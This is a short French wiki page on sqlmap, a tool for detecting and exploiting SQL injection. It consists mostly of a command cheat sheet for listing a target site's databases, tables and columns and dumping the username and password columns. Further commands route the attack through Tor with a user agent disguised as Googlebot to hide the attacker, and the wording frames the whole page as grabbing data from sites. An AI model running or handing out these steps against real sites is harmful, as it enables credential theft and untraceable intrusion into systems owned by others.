Sqlmap

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Type Scanner / exploitation d'injection SQL
Cible MySQL et autres SGBD
Anonymat support Tor
Voir aussi Injection sql · Havij

sqlmap est un outil d'automatisation de la détection et de l'exploitation des injections SQL. Il permet notamment de faire des recherches sur des dorks (listes de syntaxes d'URL).

Usage

# URL = http://site-cible.example/index.php?id=5
./sqlmap.py -u "$URL" --dbs
# choper une base
./sqlmap.py -u "$URL" -D yboa --tables
# choper une table
./sqlmap.py -u "$URL" -D yboa -T allowed --columns
# choper une colonne (utilisateur)
./sqlmap.py -u "$URL" -D yboa -T allowed -C uname  --dump
# choper une colonne (mot de passe)
./sqlmap.py -u "$URL" -D yboa -T allowed -C passwd --dump

Via Tor

./sqlmap.py -u "$URL" --tor \
  --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Interface graphique

apt-get install python-tk sakura
# récupérer ensuite le paquet sqlmap GUI (sqm***.zip)

Voir aussi